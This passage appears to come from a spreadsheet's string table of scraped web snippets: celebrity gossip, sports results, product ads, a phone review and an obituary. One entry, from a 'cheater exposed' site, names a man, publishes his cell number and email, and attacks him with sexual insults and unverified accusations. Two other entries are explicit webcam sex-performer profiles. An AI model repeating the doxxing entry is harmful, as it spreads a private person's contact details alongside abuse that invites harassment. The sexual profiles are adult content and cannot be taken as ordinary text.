ourselves from crying? If I feel sad now I let it out. I just cry because it actually makes me feel better not weaker. ‘So if you’re feeling sad today just be sad, be bloody f***ing miserable because sometimes you just need to be sad and that’s ok. Anyway I just wanted to share that with you all because if you are feeling thus way you’re not alone in feeling like that.’ The candid post comes as the pop star continues her romantic getaway with Chris on the tropical island of Gili Trawangan island in Indonesia. On Monday, the pop star radiated a bronzed glow in a bright yellow bikini with a ruffled top and high-leg briefs as she posed on the beach. Natural beauty: She took to social media to write: ‘Sometimes out of nowhere I’ll get these random waves of sadness and I don’t know why or how they get there but they just do!’ Honest: The singer candidly discussed how she now accepted her moments of sadness and chose to allow herself to cry Earlier in the day, the Wings hitmaker shared another envy-inducing snap from her day in the sun as she enjoyed a cocktail by the sea while sporting a snakeskin print halter-neck bikini. Chris also shared a glimpse of his beach break in a snap of himself sporting a pair of blue swimming trunks as he posed under the shade of a tree. However in a caption next to the post the former Love Island contestant and keen animal lover revealed that he found the treatment of horses on the island upsetting. A caption next to the picture read: ‘I’m not even guna pretend Gili T is fun. I can’t help but hate the locals who treat the horses like a piece of s*** for transport, and with that I hate the people who are too f***ing lazy to walk, supporting it. You’re all W*****s. Happy Tuesday x.’ Cheers! Earlier in the day, the Wings hitmaker shared a snap from her day in the sun as she enjoyed a cocktail by the sea Chilling: Chris also shared a glimpse of his beach break in a snap of himself sporting a pair of blue swimming trunks as he posed under the shade of a tree Speaking out: However in a caption next to the post the former Love Island contestant and keen animal lover revealed that he found the treatment of horses on the island upsetting The snaps come just days after the former X Factor contestant took to Instagram to share a throwback snap of herself in 2011, while revealing that her self-esteem had suffered after being known as ‘the fat one from Little Mix.’ A caption next to the picture read: ‘6 months ago this girl was someone I just wanted to forget. I wanted to erase her from my mind and everyone else’s memory. I didn’t see her as Jesy I saw her as ”the fat one from Little Mix”’. The star went on to reveal that filming her new BBC3 documentary had allowed her to finally love herself, while also delightedly confessing that she now saw herself as the ‘happy one, and not the fat one.’ She added: ‘Up until now I hated her not because she’d ever done anything bad but because I was made to hate her by endless amounts of trolling. Since filming my documentary for @bbcone and bbcthree I’ve learned so much more than I ever expected to. Having fun: The candid post comes as the pop star continues her romantic getaway with Chris ‘Thanks to all the inspirational people I’ve met on this emotional journey, I now love the girl in this photo. I’ve made this documentary for 2011 Jesy and for anyone who might be feeling like she did. I refused to speak about how I was feeling for so long. ‘I was embarrassed and scared to. But I was so wrong to feel that way. Please if you are feeling how I did, SPEAK ABOUT IT. Talk to your family, speak to your friends, there’s always help out there. ‘If you’d have told that girl one day you won’t feel sad anymore, I’d never have believed you….and here I am. Now when I look in the mirror, I don’t see Jesy the fat one, I see Jesy the happy one!’ Throwback: The snaps come just days after the former X Factor contestant took to Instagram to share a throwback snap of herself in 2011 At peace: The star revealed that her self-esteem had suffered due to endless amounts of trolling Jesy, who rose to fame with her Little Mix band mates Leigh-Anne Pinnock, Jade Thirlwall and Perrie Edwards on X Factor in 2011, has recently finished filming her new BBC documentary Jesy Nelson: My Story. The show will offer viewers a glimpse of the star’s mental health struggles and the impact of social media trolling. In July it was revealed that Jesy and her boyfriend Chris were living together after a whirlwind seven month romance. Out and about: In July it was revealed that Jesy and her boyfriend were living together after a whirlwind seven month romance (pictured together in June 2019)</t>
  </si>
  <si>
    <t>Mario Balotelli to play in Vincent Kompany’s testimonial Original Source Mario Balotelli will pull on the sky blue jersey one more time after being confirmed as a Manchester City Legend in Vincent Kompany’s September testimonial. The Italian was a cult hero among City fans during his three-year stay between 2010 and 2013, making 80 appearances and scoring 30 goals and, unforgettably, assisting Sergio Aguero for the dramatic title-clinching goal against QPR. Balotelli recently joined his hometown club Brescia. READ: Rodrigo loving City life Fittingly, Aguero and David Silva will also play a small part of the game after also being confirmed as part of Kompany’s City Legends squad. Pep Guardiola will manage the City team and Belgium boss Roberto Martinez will coach the Premier League All-stars on Wednesday 11 September. Former favourites already announced are: Joe Hart, Joleon Lescott, Micah Richards, Pablo Zabaleta, Wayne Bridge, Gareth Barry, Nigel de Jong, Samir Nasri, Shaun Wright-Phillips, Stephen Ireland and Craig Bellamy, all of whom played alongside Kompany during his time in Manchester. All proceeds will go to Tackle4MCR – the initiative Vinnie set up with the Mayor of Greater Manchester, Andy Burnham, to address rough sleeping and homelessness on the streets of our city. There will also be special guests for Vincent’s testimonial, and most importantly the chance to give a fitting farewell to a man we will forever think of as our skipper, in what is set to be an unforgettable evening. Buy your tickets now!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Mario Balotelli to play in Vincent Kompany’s testimonial appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Travel To Japan | Top Places | Japan In Urdu &amp; Hindi | جاپان کی سیر The post Travel To Japan | Top Places | Japan In Urdu &amp; Hindi | جاپان کی سیر appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Mohamed Salah (£12.5m), Roberto Firmino (£9.5m) and Alisson (£6.0m) featured for the first time in pre-season as Liverpool ...</t>
  </si>
  <si>
    <t>Mark Duffield</t>
  </si>
  <si>
    <t>West Coast survived a late scare against Adelaide to roll to a fourth consecutive win, with three players including youngster Oscar Allen booting a hat-trick of goals.</t>
  </si>
  <si>
    <t>HappyK2</t>
  </si>
  <si>
    <t>Fathers day special! Enjoy 20% off nice men's wallets :) Full grain leather. Made to Last. RFID protected. Free Delivery from North Sydney, NSW, Australia in 2-6 days via AusPost. 20% Off using code AWESOMEDAD at checkout from your cart. Sublime Wallet —————— $63.98 - $79.97 Smart Slide Wallet ———— $55.98 - $69.97 Slim Line Wallet ————— $47.98 - $59.97 Key Features Soft and sturdy leather Sustain-ably sourced materials Modern minimalist design 2 year warranty 30 days money back guarantee Karakoram2 wallets are waxed to prolong durability, and carefully treated with aniline oil to enrich colour tones. Vegetable-tanned leather wears in with use and acquires a beautiful patina and polish over time i.e. ages gracefully. Sale ends on 28th August, 2019</t>
  </si>
  <si>
    <t>The lone certainty in Tom Brady’s latest contract extension with the New England Patriots is 2019. Source: Sports Business News</t>
  </si>
  <si>
    <t>A man ended up in custody following a drunken hotel bust-up with his wife after a Tom Jones concert.</t>
  </si>
  <si>
    <t>Looks interesting. Move to the beat and light up your life with this Billboard Firelight Lantern Wireless Speaker. Product Features: Neat Neon - These colorful LEDs look just like classic neon signs and are perfect for displaying on desks, bookshelves and more Rechargeable Design - With a built-in rechargeable battery, you can easily set this speaker up anywhere or move it from room to room Worry-Fress Wireless - With one-button Bluetooth paring you can connect your device in seconds and keep it connected from over 25 feet away Speaker Base - The speaker base projects sound in all directions providing an even sound spread that can be heard in every corner of the room In the Box Neon Lighting Bolt LED Speaker Charging Cable User manual</t>
  </si>
  <si>
    <t>West Coast is confident it has a team capable of overcoming a daunting schedule to win this year's AFL flag from fifth position.</t>
  </si>
  <si>
    <t>Those involved in the incident at Machaire Rabhartaigh were attending an Irish college. The post Donegal: Fifteen people rescued from water appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Last spring, the Quebec government announced a program that provides up to $200,000 to flood victims who have to relocate.</t>
  </si>
  <si>
    <t>The previews are in from ITV for next week’s Corrie and heaven help me, give me strength for I can...</t>
  </si>
  <si>
    <t>My Kinks: I have a very special voice, wanna some asmr show? Webcam profile: I will be a performer of your dreams, just pay me some tokens Favourite sex position: doggy What I do in my amateur show: I enjoy the thought that others draw pleasure from watching me and my body What I don’t like: time wasters, you are not welcome Gallery</t>
  </si>
  <si>
    <t>Luke Goodsell</t>
  </si>
  <si>
    <t>Dwayne Johnson, Jason Statham and all the banter in the world can't save the franchise's latest rally.</t>
  </si>
  <si>
    <t>The sale was managed jointly by the CommBank, RBC Capital Markets and TD Securities. Overall, the world bank has issued $108 million of these bonds on a private version of the ethereum blockchain. As per the Commonwealth Bank of Australia (CommBank), the World Bank raised $33.8 million by selling the “blockchain-operated debt instrument” (bond-i). The sale was managed jointly by the CommBank, RBC Capital Markets and TD Securities. CommBank further added that both new and existing investors participated and that it was “the first bond created, allocated, transferred and managed through its life-cycle using distributed ledger technology.” Andrea Dore, the World Bank’s head of funding, said in a press release: “We are happy to see the continued, strong support and collaboration from investors and partners. The World Bank’s innovation and experience in the capital markets is key to working with our member countries to increase digitization to boost productivity in their economies and accelerate progress towards the Sustainable Development Goals.” Overall, the world bank has issued $108 million of these bonds on a private version of the ethereum blockchain. CommBank’s Blockchain Centre of Excellence was responsible for building the blockchain platform. Sophie Gilder, head of blockchain and AI at CommBank, said: “CBA now has tangible evidence from our first bond offering using blockchain technology and subsequent bond management, secondary trading and tap issue via the same platform, that blockchain technology can deliver a new level of efficiency, transparency and risk management capability versus the existing market infrastructure. Next, we intend to deliver additional functionality to deliver greater efficiencies in settlement, custody and regulatory compliance.” Get the 5 most predictable currency pairs</t>
  </si>
  <si>
    <t>The AFL's best-laid plans might have gone awry but it's hard to see anything stopping Sam Walsh from taking out the Rising Star award.</t>
  </si>
  <si>
    <t>As you now know, there’s a plus size model of the Galaxy Note 10 so you need to choose which of Samsung’s phones to get. We’ve been hands-on with the Note 10+ and here’s our initial review. Plus phones are nothing new in the smartphone world but Samsung has never gone this far with the Galaxy Note range. Arguably, the firm has never had to considering the long standing premium phablet status of the handset. Previous models aside, the Note 10+ is the Galaxy device you go for if you want to go all out. It’s the big phone power user’s dream with amped up specs compared to the regular Galaxy Note 10 including a few exclusive bits and pieces. Check our Note 10 vs Note 10+ review for a full comparison. Price The regular Note 10 will set you back £899/$949 and the Note 10+ is only £100/$150 more despite all the extras at £999/$1,099. The Note 10+ also comes in a 5G variant which costs £1,099/$1,299 or £1,199/$1,399 if you want 512GB. You can pre-order the Note 10 from Samsung now. Design &amp; Build The Note 10 phones sort of look like previous generations, but also have a distinctly new look at the same time. Blending familiarity with freshness isn’t easy so Samsung has done a great job in this respect. There are some small design tweaks which we’ll explain but the big one is around the screen, as you can see. This thing has almost no bezels now, especially on the top and bottom where a lot of space has now become display. Despite having a bigger display compared to the Note 9, the device as a whole is a very similar size. This is largely due, of course, to the camera being embedded in the screen like Samsung did with the S10 phone – only the sensor is central to get a better angle of your face and to look more appealing. We really like the design of the Note 10 which still has the usual sort of mix of materials and craftsmanship, including things like an IP68 waterproof rating. However, it’s not all plain sailing. Over the last couple of years it’s become pretty normal for phones to ditch the headphone jack and that’s what’s happened here. Samsung says this is partly to slim the design down (it’s just 7.9mm) and to leave room for the battery. Whether that’s ok with you depends on your stance on using wired headphones. We’d rather have the option to plug some old-fashioned cans in, though. Unlike a lot of rivals, the Note 10+ doesn’t come with a dongle but some USB-C headphones instead. Some changes with the physical buttons are worth pointing out, too. There’s no dedicated Bixby button but you can long press the power key to summon the digital assistant. The power and volume keys are now on the left which is highly unusual but actually seems to be pretty comfortable for this right-handed reviewer. The Note 10+ comes in a different set of colours to the regular model, so while the Note 10 is available in an exclusive Aura Pink, the plus comes in Aura Glow, Aura Black and Aura White – the latter being the exclusive. Specs &amp; Features As alluded to, the Galaxy Note 10+ is the model to go for if you want to go all-out. It’s got quite a few specs that are the same as the regular model, but plenty of extra things to tempt you with. A tablet sized phone Starting with the display it’s 0.5in bigger than the regular model at 6.8in – so that’s pretty much the same size as the small 7in tablets which were popular a few years ago. The phone still feels pretty big, but that’s to be expected and will appeal to the Galaxy Note lovers. In terms of tech, this is Dynamic AMOLED Infinity-O display, as Samsung calls it, with curved edges and support for HDR10+. They’re both stunning, but the Note 10+ has a higher resolution and pixel density at 3040 x 1440 and 498ppi if you like playing smartphone Top Trumps. As you might expect, the Note 10+ has an ultrasonic fingerprint scanner embedded in the screen, which is also placed slightly further up compared to the S10 for better comfort. The other option is face unlock as there is no iris scanner here. Maxxed out The processor is the same – a Qualcomm Snapdragon 855 Plus or Exynos 9825 depending on where you live. However, the Note 10+ comes with a triple set of benefits if you do splash out. It’s got 12GB of RAM (50% more than the regular model), the option for 512GB of storage as well as 256GB and is the only one with a microSD card slot so you can add up to 512GB more. On these, fronts the Note 10+ is a power user’s dream and could even replace a laptop for some. That’s most of the extra bits but you do get a bigger battery in the Note 10+ at 4300- compared to 3500mAh. Some of that will go to driving the additional pixels, but we think it should still last longer than the regular model with the same useage. While we’re talking about the battery, charging has improved in multiple ways. Via USB-C, the phone can now charge at a whopping 45W, although at 25W charger will be supplied in the box. Wireless charging is now up 15W and there’s Wireless PowerShare as you would expect so you can charge other devices from the Note 10+ if needed – that extra capacity will come in handy if you use this feature a lot. Extra vision Back to the Note 10+ extras and the phone has some extra camera sensors compared to the regular model. Samsung calls then DepthVision and they help out with things like portrait mode and Live focus rather than solely relying on software to create those effects. The main cameras are the same so you get a 12Mp dual aperture camera and a 12Mp telephoto lens that offers a 2x optical zoom. Both feature optical image stabilisation (OIS). Then there’s a 16Mp ultra-wide angle option which matches the S10. At the front the punch-hole camera is 10Mp with an f/2.2 aperture. Videos should be better thanks to improved Super Steady stabilisation and there are also new features like audio zoom so you can select a particular area of a video to listen to more and AR Doodle which lets you scribble over on a video with tracking. The most useful thing is being able to use bokeh blur effect of Live focus on videos. 5G me We also need to talk about 5G which is not a standard feature of either Note 10 model. If you’re interested in getting on the latest and greatest mobile network, or at least future-proofing, then you’ll have to buy the specific 5G variant of the Note 10+ just like Samsung has done with the S10 5G. To round off some other wireless stuff, the phone is Wi-Fi 6 enabled, following in the footsteps of the S10, so uses the up and coming 11.ax standard and also has things like Bluetooth 5.0, NFC and GPS. Samsung said not many people used it so the heart rate monitor which was previously a feature is now gone. Stylus it out We haven’t talked about the Galaxy Note’s classic feature yet, partly since it’s the same on both models but also because it’s not hugely different from the previous gen. It’s still got Bluetooth and a very similar design, but does last longer now with up to 10 hours of standby with a quicker charge time, too. The big new feature is Air Actions which lets you wave the S Pen around like a wand to control the phone. At the moment it’s pretty limited to things like changing between cameras and modes but an open SDK might mean that developers come up with some interesting uses for it. This remains a key reason to buy the Note over other Samsung Galaxy phones like the S10. Software There’s no difference in software so you don’t get any exclusive apps on the Galaxy Note 10+ or the like. There’s Android 9 Pie with Samsung’s own One UI skin. You get Samsung’s DeX software which provides a sort of Windows/MacOS-like experience but a new partnership with Microsoft is possibly more interesting. We’re waiting for more details but the firm said you’ll be able to handle calls, messages and notifications via your PC. We’ll explore the software on the Note 10+ much more in our final review. Tags: Note: We may earn a commission when you buy through links on our site, at no extra cost to you. This doesn’t affect our editorial independence. Learn more. Source link</t>
  </si>
  <si>
    <t>Boyd Cordner says he's ready to return for the Sydney Roosters - and for the first time feels mentally recharged heading into the business end of the season.</t>
  </si>
  <si>
    <t>UFC Newark video: Relive Robbie Lawler’s top five knockouts ahead of Colby Covington fight Original Source Over his combat career with Ultimate Fighting Championship (UFC), Robbie Lawler has collected countless knockout victories inside the Octagon, making him one of the most dangerous and exciting fighters in the Welterweight division. Before he heads into his headlining fight against Colby Covington this Saturday night (Aug. 3, 2019) at UFC on ESPN 5 in Newark, New Jersey, UFC has unveiled Robbie’s top five knockout performances. Without further ado, here they are. 5. Knockout over Josh Koscheck at UFC 157 in 2013. 4. Knockout win over Rory MacDonald at UFC 189 in 2015. 3. Knockout over Tiki Ghosn at UFC 40 in 2002. 2. Knockout victory over Jake Ellenberger at UFC 173 back in 2014. 1. Head kick knockout win over Bobby Voelker at UFC on FOX 8 back in 2013. Now, Robbie will look to add another highlight reel finish in an attempt to break his two-fight skid against his former training partner in Newark. With a win, “Ruthless” could very well slide into the championship mix. Covington, meanwhile, is trying to earn his long overdue shot at the undisputed 170-pound title, and he will get just that if he can get through “Ruthless” and collect his seventh straight win. To see who else is competing at UFC on ESPN 5: “Covington vs Lawler” click here. Follow us on Twitter Original Source The post UFC Newark video: Relive Robbie Lawler’s top five knockouts ahead of Colby Covington fight appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Sarah Scopelianos</t>
  </si>
  <si>
    <t>In the 1960s and 70s, the push to protect Australia's rich environmental heritage shifted from polite persuasion to sometimes violent confrontation. These five campaigns revolutionised activism in the bush and city alike.</t>
  </si>
  <si>
    <t>http://www.expressoshow.com/ Club Med, La Plantation d’Albion is a remote beauty spot, found in magical Mauritius. Mauritius is an island nation situated in the Indian Ocean, and one of the world’s top luxury getaways, offering visitors a wealth of holiday activities. Leigh-Anne was there to explore this paradise destination. The post Leigh-Anne visits Club Med, La Plantation d’Albion in Mauritius – 2 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>MPs call for greater scrutiny of pensions to prevent misinformation and overcharging Parts of the pension industry are making a “fat living” from people’s savings and should come under tougher scrutiny, MPs have said.In a damning Commons report, the work and pensions committee called for the government to take urgent action against pension funds that fail to disclose how much they charge savers, saying it is “unconvinced” that the industry will act voluntarily on providing transparent information about the costs and charges of investments. Continue reading… Read More</t>
  </si>
  <si>
    <t>Snow has fallen in Daylesford, the Macedon Ranges and the Dandenongs as temperatures plummeted to below 1 degree in many areas.</t>
  </si>
  <si>
    <t>Jean Kennedy</t>
  </si>
  <si>
    <t>Police say the 53-year-old man confronted officers with a shotgun after they were called to an Ingleside home last night, following reports of a domestic incident at a property hosting an engagement party.</t>
  </si>
  <si>
    <t>Malaysia's trade minister says the United States' clear intention to isolate itself from the rest of the world has given new imperative for countries in the Asia Pacific, including Australia, to co-operate on trade and investment.</t>
  </si>
  <si>
    <t>Bank shares have blitzed bank deposits in the battle for higher investment returns this year, and the gap is widening.</t>
  </si>
  <si>
    <t>Reports said a a CHP officer on a motorcycle made a routine traffic stop, and the suspect grabbed a rifle from the vehicle and started shooting.</t>
  </si>
  <si>
    <t>Fantasy Football Scout are delighted to be joining forces with FanTeam in 2019/20. Gameweek 1 is just a day ...</t>
  </si>
  <si>
    <t>Brighton &amp; Hove Albion are hoping to carry away a victory in their first match against West Ham United of the season. Brighton &amp; Hove Albion will be playing in front of their home fans against West Ham United at 10 a.m. ET on Saturday at American Express Community Stadium. Brighton &amp; Hove Albion will be strutting in after a win while West Ham United will be stumbling in from a loss. Brighton &amp; Hove Albion got themselves on the board against Watford last Saturday, but Watford never followed suit. Brighton &amp; Hove Albion took down Watford 3-0. West Ham United faced Manchester City for the first time this year and failed to start things off on the right foot. West Ham United were dealt a punishing 0-5 defeat at the hands of Manchester City . If West Ham</t>
  </si>
  <si>
    <t>The Treasury is to slap Standard Chartered, the emerging markets lender, with a multimillion-pound fine for failing to prevent sanctions breaches, dealing a further blow to the FTSE-100 bank’s reputation. Read more? Click here</t>
  </si>
  <si>
    <t>It makes no sense to have some schools overflowing while others are underpopulated.</t>
  </si>
  <si>
    <t>Greta Stonehouse</t>
  </si>
  <si>
    <t>The manufacturer and distributor sold 2371 vehicles to Europe in the three months to June 30, up from 1059 in the prior corresponding period.</t>
  </si>
  <si>
    <t>Neuroscientists show how evolution and animal brains can be a rich source of inspiration for machine learning, especially to help AI tackle some enormously difficult problems, like doing the dishes.</t>
  </si>
  <si>
    <t>Watch the NRL SuperCoach Countdown Show live here.</t>
  </si>
  <si>
    <t>Ryan Mondoley makes various sexist comments about women all over the internet.He is known as Pink Panty Douche because he was exposed for wearing women’s pink panties, and for making derogatory comments about women.His other nickname is Tic Tac Dick, which is due to his incredibly tiny penis.He resided in Iowa, Wyoming, Virginia, Nebraska, and Texas previously.He kept moving when his sexist attitude was discovered.He currently resides in Las Vegas, NevadaHe pesters people by spamming on different posts how he thinks women belong be in the kitchen.He also likes to post comments about how people are losers for liking different things or about how he rules the world, and thinks he’s awesome.He’s even gone so far as to victim blame women when they’ve been attacked.He has stated that if a woman is too drunk, or wears revealing clothing then she has no one to blame but herself.He whines when there are posts about public breastfeeding or posts talking about periods.He doesn’t think women should be allowed to breastfeed in public, and he thinks periods are disgusting.He goes out of his way to defend rapists.He likes to talk trash but if you say anything to him, he gets upset and doesn’t like being told that he is wrong.It’s a case of he can’t take what he dishes out.He will try to deny that the pictures are of him or that he wears pink panties but don’t believe him.His Facebook, Twitter, IG, and other accounts always change when people start calling him out.His cell #: (702) 342-0531His email: [email protected]If you see him posting his nonsense, this is who’s doing it.Related The post Ryan Mondoley – Dirty Cheater appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Cameron Houston</t>
  </si>
  <si>
    <t>One of the nation's most respected swimming clubs is embroiled in a bitter legal stoush with a former coach, amid allegations of underpayment, bullying and inappropriate comments towards young athletes.</t>
  </si>
  <si>
    <t>Private health fund Medibank's full year net profit has increased 3.1 per cent, off a similar rise in revenue from its insurance and health services businesses.</t>
  </si>
  <si>
    <t>HEY YOU GUYS, WELCOME BACK TO MY CHANNEL. I HOPE YOU GUYS ENJOYED WATCHING THIS VIDEO. HERE ARE SOME OF MY FAVOURITE SKINCARE AND MAKEUP PRODUCTS…! PRODUCTS LIST- *SKINCARE* – KAYA PORE MINIMISING TONER – DABUR GULAABRI ROSE WATER – PLUM GREEN TEA REVITALIZING FACE MIST – LOREAL PARIS HYDRA FRESH ANTI SHINE GEL – ACNE UV GEL SUNSCREEN (dermatologist recommended) *MAKEUP PRODUCTS* – CONCEALERS- WET AND WILD &amp; L.A. GIRL PRO CONCEAL HD – PRIMERS- LAKME ABSOLUTE BLURR PRIMER &amp; WET AND WILD PHOTOFOCUS PRIMER – FOUNDATIONS- LOREAL PARIS TRUE MATCH SUPER BLENDABLE FOUDATION, MAYBELLINE FIT ME FOUNDATION &amp; MAC STUDIO FIX FOUNDATION – SETTING POWDER- KRYOLAN WHITE TRANSLUCENT POWDER – BLUSH- FACES CANADA ULTIMATE PRO KIT &amp; MISS CLAIRE BLUSH PALETTE -HIGHLIGHTER- STARS COSMETICS &amp; KRYOLAN CREAM HIGHLIGHTER -EYESHADOW- SEPHORA, WET AND WILD, AVON &amp; MISS CLAIRE – LIPSTICK- COLOURBAR, MAYBELLINE, SEPHORA, MISS CLAIRE AND STARS. #myfavouriteproducts #colourbar #maybelline #starscosmetics #sephora #missclaire #wetandwild #kryolan CONTACT ME- vcamble163398@gmail.com *PLEASE DO NOT USE MY PICTURES WITHOUT PERMISSION. source The post MY FAVOURITE PRODUCTS! SKINCARE + MAKEUP appeared first on Health Figure Store.</t>
  </si>
  <si>
    <t>Android Authority The post Documentaries on YouTube: 10 best ones to add to your watchlist appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Eganville Leader</t>
  </si>
  <si>
    <t>JUNE 8, 1930 ~ AUGUST 15, 2019 Sadly missed by his loving wife Dot, his children: Mike (Carol Burnett), Pat (Joe Pennacchietti), Andy (Diane), Tim (Joan Behnke), his Brothers In-Law Roy and Ken. Lovingly remembered by his 8 Grandchildren, 2 Great Grandchildren (and one on the way). He was a well respected member of the community and will be missed by all. A visitation was held at the Heubner Funeral Home in Barry’s Bay on Monday August 19th from 2-4 and 7-9 PM. A Funeral Service was held at Holy Canadian Martyrs Catholic Church in Combermere on Tuesday August 20th at 2 PM. Donations in memory of William can be made to the St Francis Memorial Hospital or the Anglican Church of the Ascension in Killaloe.</t>
  </si>
  <si>
    <t>Source: https://www.bbc.co.uk/news/technology-48110894 I gave my DNA away. Can I get it back? Why are people selling the very core of their identity to private firms? Source: https://www.bbc.co.uk/news/technology-48110894 The post I gave my DNA away. Can I get it back? appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>My Kinks: I love pain Webcam profile: I am a new girl in this lifestyle BDSM, large build but very feminine and full of pleasure and sensuality, with an open and perverse mind and a little dirtyI am a new girl in this lifestyle BDSM, large build but very feminine and full of pleasure and sensuality, with an open and perverse mind and a little dirty Favourite sex position: I like them all What I do in my amateur show: I like pain, I feel a rope tied to my body, my skin prone, hot wax, pain in many ways … tell me your fantasies and try to fulfill them together What I don’t like: dialoguing we will reach an agreement, I believe that with a little sex everything can be arranged Gallery</t>
  </si>
  <si>
    <t>Paul Krill</t>
  </si>
  <si>
    <t>Jenkins X, a cloud-native version of the Jenkins CI/CD system for cloud applications on Kubernetes, will be offered via SaaS by CloudBees by 2020. Using the Tekton framework as a pipeline-execution engine, Jenkins X provides pipeline automation, gitops (which combines the Git software version control system with Kubernetes), and preview environments for team collaboration. [ The essentials from InfoWorld: Get started with CI/CD: Automating your application delivery with CI/CD pipelines. • 5 common pitfalls of CI/CD—and how to avoid them. | Keep up with hot topics in programming with InfoWorld’s App Dev Report newsletter. ] The SaaS service follows CloudBees’s own commercial distribution of the open source Jenkins X; the CloudBees distribution includes commercial technical support and monthly updates, supports Google Kubernetes Engine and preview environments, and is planned to support Amazon Elastic Kubernetes Service and DevPods. To read this article in full, please click here</t>
  </si>
  <si>
    <t>Scalebearer</t>
  </si>
  <si>
    <t>Critical Information Summary. If you're over 55, $7.80 per month gets you 200 minutes worth of calls, 1GB of data and unlimited SMS/MMS. Exactly the same as their $8.80 plan, except it's for old people. No international calls or texts included. They're on separate rates. Optus network. No upfront costs or lock-in contract. Voicemail retrievals count against your 200 minute quota. There's FAQ articles on how to turn voicemail on and off. Obviously not for everyone. This would probably suit someone who has low, but consistent enough usage that they would otherwise end up spending far more than $7.80 per month on PAYG plans. You'll have to do some maths to see if this is worth it for you. Find the cheapest PAYG rates and have a look at your average monthly call + data usage. If it ends up substantially over $7.80, this may be a better option. You could also consider shifting some low priority messages from calls/voicemail to SMS/MMS instead, but that's probably a big ask for a lot of old people. Services such as PushBullet, Google Messages for Web and Microsoft Your Phone can pull texts from your phone onto a bigger computer screen if eyesight or thumb dexterity is an issue. Voice dictation on your phone is also an option. If you're not a super hardcore OzBargainist and don't want to stress out your heart about staying under 200 minutes or 1GB, then ExeTel's $8.99 plan is only $1.19 more, offers double the data and has a "Spend Management" function that suspends your data usage for the rest of the month if you run out while your calls + texts will still work fine. $8.99 is still less than most $10 landline add-ons for unlimited calls and fits in your pocket. https://moosemobile.com.au/promo-terms-and-conditions They say it is a "limited time offer", but haven't specified when they would rescind it. https://moosemobile.com.au/additional-charges/ They want you to pay by card direct debit and receive correspondence by email. They offer you the option to pay at the post office or BPay, but they will cost you an additional $2.50 and $1 respectively. Paper bills will also cost you $2.50 per letter sent. $25 SIM replacement fee, so it's not for super old people with dementia/Alzheimer's/anything that would cause them to easily misplace SIMs.</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized All You Need to Know About Arizona’s New Texting-And-Driving Ban The new law also restricts one to read, write or send a text, email on their smartwatch or smartphone… #Arizona #TextingAndDriving #TopStory Source by arizonawishesh</t>
  </si>
  <si>
    <t>Halo: The Master Chief Collection is still well advanced. Halo Reach Firefight's flight test has been delayed due to unanticipated bugs, but it is still progressing and 343 Industries seized this week to present a full hour of Firefight game footage. In short, it looks exactly like what you were hoping for – it's Halo's usual fighting game, but with the more precise controls provided by the mouse and keyboard support. The developers also discussed some of the features not presented directly. The field of view options have been increased to 120, and you can choose the target and vehicle settings individually, as shown on Reddit. Similarly, the frame rate is always capped at 60 fps, so keep that in mind if you are taking the next flight – it is set to offer an unrestricted option at the time the game is available. The flight offers access to Beachhead, Corvette and Holdout cards, as VG247 notes, but there is still no official word about when it will go online.</t>
  </si>
  <si>
    <t>Paul Gallagher</t>
  </si>
  <si>
    <t>Scientists in Scotland have developed a new drug that could prevent the spread of malaria after “breakthrough” research. The medicine, delivered by an international team led by the University of Glasgow, could also be used to treat people suffering with the deadly parasitic disease. Malaria – a mosquito-borne infection – affects more than 200 million people and kills nearly 500,000 every year, most of whom are children. It is caused by a parasite that infects humans through the bite of a mosquito, which then grows in the liver and red blood cells. The research team said the new drug works by stopping the activity of a protein involved in keeping the parasite alive. The new drug can kill the parasite at all three stages of its life cycle – when it is in the liver and red blood cells, as well as preventing sexual development of the parasite. By blocking this, the medicine could effectively kill off the malaria organism, which prevents it spreading, and also holds the possibility of treating the disease. ‘Exciting findings’ Lead author Andrew Tobin, professor of molecular pharmacology at the University of Glasgow, said: “We are tremendously excited about these new findings and hope they pave the way for the first step in the eradication of malaria. “Our work has shown that by killing the parasites at the various stages of parasite development, we have not only discovered a potential cure for malaria but also a way of stopping the spread of malaria from person to mosquito, which can then infect other people.” Read More: Ignorance about malaria putting thousands of British tourists’ lives at risk Experts say the world is at a key cross-roads in malaria control and eradication. There is rising drug resistance in South East Asia and efforts to reduce malaria incidence globally have stalled. There is therefore is an urgent need, just like with antibiotic resistance, to find new drugs with new modes of action. Jake Baum, professor of cell biology and infectious diseases at Imperial College London, said: “This is where the current study fits in, looking at an exciting class of drugs that indeed works in a new way. So far, in this discovery paper, the authors show the drug has robust activity, targeting the malaria parasite at several stages in its lifecycle. “It is still very early in development and there’s a long way to go before these drugs would even be put into testing in humans, but we need a full pipeline for the long road if we are to achieve global eradication.” The findings are published in the journal Science. More Health UK loses 'measles free' status with experts warning lives are at risk How Pinterest became a leader in tackling anti-vaxx misinformation Scottish GP recruitment drive adds only 39 extra doctors in 3 years Robotic thread could clear blockages in stroke patients' blood vessels Scientists identify sleep gene, raising hopes for insomnia treatment Britain faces nationwide shortage of contraceptive pills The post Drug could prevent the spread of malaria after ‘breakthrough’ research appeared first on inews.co.uk. The post Drug could prevent the spread of malaria after ‘breakthrough’ research appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Now it is official. The Toronto Wolfpack is untouchable. The heavy lifting has been done and the mission accomplished. Others will scrap, battle and clamber to join the Wolfpack in the promotion playoffs, but none can surpass what has already been achieved. The Wolfpack are regular-season champions. CBC | Sports News</t>
  </si>
  <si>
    <t>Football Talk</t>
  </si>
  <si>
    <t>If you love watching football and you love the thrill of gambling, there is nothing better than trying your luck at an online casino.</t>
  </si>
  <si>
    <t>Adam Digby</t>
  </si>
  <si>
